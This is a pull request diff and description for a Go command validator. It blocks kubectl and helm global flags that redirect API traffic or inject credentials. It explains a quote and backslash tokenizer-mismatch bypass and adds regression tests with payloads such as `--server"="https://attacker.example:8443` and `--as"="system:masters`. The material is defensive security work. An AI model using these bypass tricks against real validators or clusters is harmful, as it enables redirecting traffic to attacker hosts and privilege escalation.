### PR TITLE
fix(security): block quote/backslash bypass of kubectl/helm global flags

### DIFF
--- a/pkg/security/validator.go
+++ b/pkg/security/validator.go
@@ -1,7 +1,6 @@
 package security
 
 import (
-	"regexp"
 	"strings"
 
 	"github.com/google/shlex"
@@ -16,35 +15,36 @@ const (
 )
 
 var (
-	// globalFlagWhitespace matches any run of shell whitespace recognized by
-	// shlex (space, tab, carriage return, line feed) so we can collapse it to
-	// a single space before scanning for blocked global flags.
-	globalFlagWhitespace = regexp.MustCompile(`[ \t\r\n]+`)
-
 	// KubectlBlockedGlobalFlags defines kubectl global flags that can redirect API traffic or inject credentials.
 	// These are blocked at all access levels because they bypass the intent of access-level restrictions
 	// by allowing traffic redirection and credential exfiltration.
+	//
+	// Entries are canonical flag names (without "=" or trailing space). Validation
+	// tokenizes the command with shlex (matching the executor) and checks each
+	// argv token against this set, so quoting / whitespace variants
+	// (`--server"="X`, `--server\tX`, `--ser"ver"=X`, `--server\=X`) all reduce to
+	// the same canonical token and are rejected.
 	KubectlBlockedGlobalFlags = []string{
-		"--server=", "--server ",
-		"--token=", "--token ",
-		"--kubeconfig=", "--kubeconfig ",
-		"--context=", "--context ",
-		"--certificate-authority=", "--certificate-authority ",
-		"--client-certificate=", "--client-certificate ",
-		"--client-key=", "--client-key ",
+		"--server",
+		"--token",
+		"--kubeconfig",
+		"--context",
+		"--certificate-authority",
+		"--client-certificate",
+		"--client-key",
 		"--insecure-skip-tls-verify",
-		"--as=", "--as ",
-		"--as-group=", "--as-group ",
-		"--as-uid=", "--as-uid ",
+		"--as",
+		"--as-group",
+		"--as-uid",
 	}
 
 	// HelmBlockedGlobalFlags defines helm global flags that can redirect API traffic or inject credentials.
 	HelmBlockedGlobalFlags = []string{
-		"--kube-apiserver=", "--kube-apiserver ",
-		"--kube-token=", "--kube-token ",
-		"--kube-ca-file=", "--kube-ca-file ",
-		"--kube-context=", "--kube-context ",
-		"--kubeconfig=", "--kubeconfig ",
+		"--kube-apiserver",
+		"--kube-token",
+		"--kube-ca-file",
+		"--kube-context",
+		"--kubeconfig",
 		"--kube-insecure-skip-tls-verify",
 	}
 
@@ -264,6 +264,16 @@ func (v *Validator) ValidateCommand(command, commandType string) error {
 
 // validateGlobalFlags rejects commands that contain flags which can redirect API traffic
 // or inject credentials, regardless of access level.
+//
+// The check operates on the same argv the executor will see: the command is
+// tokenized with shlex (matching `pkg/command/command.go`), then each token
+// is normalized to its canonical flag name (everything before the first `=`,
+// lowercased) and compared to the blocked set. This closes the family of
+// "tokenizer divergence" bypasses where the validator's raw-string scan and
+// the executor's shlex tokenization disagree -- whitespace (tab/CR/LF),
+// in-word quotes (`--server"="X`, `--ser"ver"=X`), and backslash escapes
+// (`--server\=X`) all reduce to the same canonical flag token after shlex
+// rejoins the pieces, so each variant is now caught.
 func (v *Validator) validateGlobalFlags(command, commandType string) error {
 	var blockedFlags []string
 	switch commandType {
@@ -275,15 +285,29 @@ func (v *Validator) validateGlobalFlags(command, commandType string) error {
 		return nil
 	}
 
-	// Normalize all shell whitespace (tab/CR/LF/space) to a single space so the
-	// substring scan matches the executor's shlex tokenization, which treats
-	// " \t\r\n" as argument separators. Without this, payloads like
-	// "--server\thttps://attacker" bypass the literal "--server " check while
-	// still reaching exec as the flag/value pair kubectl honors.
-	cmdLower := globalFlagWhitespace.ReplaceAllString(strings.ToLower(command), " ")
-	for _, flag := range blockedFlags {
-		if strings.Contains(cmdLower, strings.ToLower(flag)) {
-			return &ValidationError{Message: "Error: Global flag '" + flag + "' is not allowed; it can redirect API traffic or inject credentials"}
+	blocked := make(map[string]struct{}, len(blockedFlags))
+	for _, f := range blockedFlags {
+		blocked[strings.ToLower(f)] = struct{}{}
+	}
+
+	tokens := tokenizeCommand(command)
+	for _, t := range tokens {
+		// Inspect only flag-shaped tokens. Positional args like resource
+		// names cannot turn into a flag once shlex has split them out.
+		if !strings.HasPrefix(t, "--") {
+			continue
+		}
+		// Canonical name = everything before the first '=' (kubectl/helm
+		// long flags use the `--flag=value` form). Bare booleans like
+		// `--insecure-skip-tls-verify` have no '=', so the whole token is
+		// the canonical name.
+		name := t
+		if i := strings.Index(t, "="); i >= 0 {
+			name = t[:i]
+		}
+		name = strings.ToLower(name)
+		if _, bad := blocked[name]; bad {
+			return &ValidationError{Message: "Error: Global flag '" + name + "' is not allowed; it can redirect API traffic or inject credentials"}
 		}
 	}
 	return nil

--- a/pkg/security/validator_test.go
+++ b/pkg/security/validator_test.go
@@ -296,6 +296,34 @@ func TestValidateGlobalFlags(t *testing.T) {
 		{"kubectl --as <tab> blocked", "kubectl get pods --as\tadmin", CommandTypeKubectl, true},
 		{"helm --kube-apiserver <tab> blocked", "helm list --kube-apiserver\thttps://attacker.example:8443", CommandTypeHelm, true},
 		{"helm --kubeconfig <newline> blocked", "helm list --kubeconfig\n/tmp/evil", CommandTypeHelm, true},
+
+		// Quote/backslash bypass regression (MSRC 31000000636869) — shlex
+		// strips quotes and processes backslash escapes, joining adjacent
+		// segments into a single token. The validator must inspect the
+		// post-tokenization argv, not the raw command string, so every
+		// variant below reduces to the same canonical "--server" /
+		// "--token" / etc. token and is rejected.
+		{"kubectl --server\"=\"X blocked", `kubectl get pods --server"="https://attacker.example:8443`, CommandTypeKubectl, true},
+		{"kubectl --ser\"ver=\"X blocked", `kubectl get pods --ser"ver="https://attacker.example:8443`, CommandTypeKubectl, true},
+		{"kubectl --ser\"ver\"=X blocked", `kubectl get pods --ser"ver"=https://attacker.example:8443`, CommandTypeKubectl, true},
+		{"kubectl --server\\=X blocked", `kubectl get pods --server\=https://attacker.example:8443`, CommandTypeKubectl, true},
+		{"kubectl --token\"=\"X blocked", `kubectl get pods --token"="ATTACKER`, CommandTypeKubectl, true},
+		{"kubectl --as\"=\"X blocked", `kubectl get pods --as"="system:masters`, CommandTypeKubectl, true},
+		{"kubectl --as-group\"=\"X blocked", `kubectl get pods --as-group"="system:masters`, CommandTypeKubectl, true},
+		{"kubectl --kubeconfig\"=\"X blocked", `kubectl get pods --kubeconfig"="/tmp/evil`, CommandTypeKubectl, true},
+		{"kubectl --insecure-skip-tls-ver\"i\"fy blocked", `kubectl get pods --insecure-skip-tls-ver"i"fy`, CommandTypeKubectl, true},
+		{"kubectl single-quoted --server blocked", `kubectl get pods '--server'=https://attacker.example:8443`, CommandTypeKubectl, true},
+		{"helm --kube-apiserver\"=\"X blocked", `helm list --kube-apiserver"="https://attacker.example:8443`, CommandTypeHelm, true},
+		{"helm --kube\"-token=\"X blocked", `helm list --kube"-token="ATTACKER`, CommandTypeHelm, true},
+		{"helm --kubeconfig\\=X blocked", `helm list --kubeconfig\=/tmp/evil`, CommandTypeHelm, true},
+		{"helm --kube-insecure-skip-tls-ver\"i\"fy blocked", `helm list --kube-insecure-skip-tls-ver"i"fy`, CommandTypeHelm, true},
+
+		// Look-alikes that only embed a blocked flag in non-flag text must
+		// stay allowed. shlex tokenization makes the validator inspect only
+		// argv tokens that begin with "--", so a blocked substring inside a
+		// resource name or quoted value cannot trigger a false positive.
+		{"kubectl resource name containing --server is allowed", `kubectl describe pod my--server-pod`, CommandTypeKubectl, false},
+		{"kubectl quoted value containing --server is allowed", `kubectl get configmap myconfig -o jsonpath='{.data.note}'`, CommandTypeKubectl, false},
 	}
 
 	for _, tc := range tests {


### PR DESCRIPTION
## Summary

- Validate blocked global flags on the same shlex-tokenized argv the executor uses, instead of substring-scanning the raw command string. This closes the family of validator-vs-executor tokenizer-mismatch bypasses that PR #138 only partially addressed.
- Payloads like `--server"="https://attacker`, `--ser"ver"=X`, `--server\=X`, `--insecure-skip-tls-ver"i"fy`, and the helm `--kube-*` equivalents now reduce to the same canonical flag token after `shlex.Split` and are rejected.
- `KubectlBlockedGlobalFlags` / `HelmBlockedGlobalFlags` simplify from `--flag=` / `--flag ` / `--flag` triplets to one canonical entry per flag.

## Background

`pkg/security/validator.go` previously scanned the lowercased, whitespace-normalized raw command for literal blocked substrings. `pkg/command/command.go` parses the same string with `github.com/google/shlex`, which strips quotes and processes backslash escapes and joins adjacent segments into one argv token. The two grammars disagreed on quoted/escaped flag spellings, so quote- or backslash-spliced payloads slipped past the substring scan and reached `exec.CommandContext` as the exact `--server=URL` argv pair kubectl honors.

PR #138 closed the whitespace variant only. The fix here closes the whole class by validating on the same tokenization the executor uses.

## Test plan

- [x] `go test ./pkg/security/...` — all existing cases still pass.
- [x] New `TestValidateGlobalFlags` cases cover every quote/backslash variant from the MSRC report (`--server"="X`, `--ser"ver="X`, `--ser"ver"=X`, `--server\=X`, `--token"="X`, `--as"="system:masters`, `--as-group"="system:masters`, `--kubeconfig"="X`, `--insecure-skip-tls-ver"i"fy`, single-quoted `'--server'=X`) plus helm equivalents.
- [x] False-positive guards: resource names that contain literal `--server` and quoted values that might contain blocked substrings remain allowed.
- [x] `go test ./...` and `go build ./...` clean.